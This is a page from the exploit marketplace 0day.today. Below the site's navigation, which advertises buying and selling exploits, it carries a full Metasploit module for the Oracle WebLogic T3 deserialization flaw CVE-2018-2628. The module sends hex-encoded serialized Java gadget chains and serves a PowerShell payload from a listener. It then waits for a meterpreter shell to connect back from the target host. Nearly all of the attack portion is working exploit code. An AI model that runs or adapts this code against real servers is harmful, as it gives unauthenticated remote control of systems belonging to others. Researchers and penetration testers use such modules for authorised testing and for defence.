0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle Weblogic Server Deserialization Remote Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic
Server T3 interface can send a serialized object to the interface to
execute code on vulnerable hosts.
},
'Author' =>
[
'brianwrf', # EDB PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-2628'],
['EDB', '44553']
],
'Privileged' => false,
'Targets' =>
[
[ 'Windows',
{
'Platform' => ['win']
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 7001
},
'DisclosureDate' => 'Apr 17 2018'))
end
def gen_resp
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
pwrshl.gsub!("%COMSPEC%", "cmd.exe")
tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
mycmd << tmp_dat
# Response data taken from JRMPListener generated data:
# java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
# Modified captured network traffic bytes. Patch in command to run
@resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
@resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
@resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
@resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
@resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
@resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
@resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
@resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
@resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
@resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
@resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
@resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
@resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
@resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
@resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
@resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
@resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
@resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
@resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
@resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
@resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
@resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
@resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
@resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
@resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
@resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
@resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
@resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
@resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
@resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
@resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
@resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
@resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
@resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
@resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
@resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
@resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
@resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
@resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
@resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
@resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
@resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
@resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
@resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
@resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
@resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
@resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
@resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
@resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
@resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
@resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
@resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
@resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
@resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
@resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
@resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
@resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
@resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
@resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
@resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
@resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
@resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
@resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
@resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
@resp << '673badd256e7e91d7b470200007078700000000174'
@resp << mycmd
@resp << '74'
@resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
@resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
@resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
@resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
@resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
@resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
@resp << '7e005a'
end
def on_client_connect(client)
# Make sure to only sent one meterpreter payload to a host.
# During testing the remote host called back up to 11 times
# (or as long as the server was listening).
vprint_status("Comparing host: #{client.peerhost}")
if @met_sent.include?(client.peerhost) then return end
@met_sent << client.peerhost
vprint_status("met_sent: #{@met_sent}")
# Response format determined by watching network traffic
# generated by EDB PoC
accept_conn = '4e00'
raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
accept_conn << raccept_conn
accept_conn << '0000'
accept_conn << client.peerport.to_s(16).rjust(4,'0')
client.put([accept_conn].pack('H*'))
client.put([@resp].pack('H*'))
end
def t3_handshake
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
sock.put([shake].pack('H*'))
sleep(1)
sock.get_once
end
def build_t3_request_object
# data block is from EDB PoC
data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
data << '700000000a000000030000000000000006007070707070700000000a00000003'
data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
data << '2d4147444d565155423154362e656883348cd6000000070000'
data << rport.to_s(16).rjust(4, '0')
data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
data << '863d1d0000000078'
sock.put([data].pack('H*'))
sleep(2)
sock.get_once
end
def send_payload_objdata
# JRMPClient2 payload generated from EDB PoC:
# python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
# Patch in srvhost and srvport
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
payload << '78707702000078fe010000'
# Data
payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
payload << '1e030000787077'
unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
unicast_dat = '000a556e696361737452656600'
unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
unicast_dat << unicast_srvhost
unicast_dat << '0000'
unicast_dat << srvport.to_s(16).rjust(4,'0')
unicast_dat << '000000004e18654b000000000000000000000000000000'
unicast_dat << '78'
payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
payload << unicast_dat
payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
payload << '6f3b290000001b7878fe00ff'
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
sock.put([data].pack('H*'))
sleep(1)
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
@met_sent = []
gen_resp
connect
vprint_status('Sending handshake...')
t3_handshake
build_t3_request_object
start_service
vprint_status('Sending payload...')
send_payload_objdata
# Need to wait this long to make sure we get a shell back
sleep(10)
end
end
# 0day.today [2024-11-14] #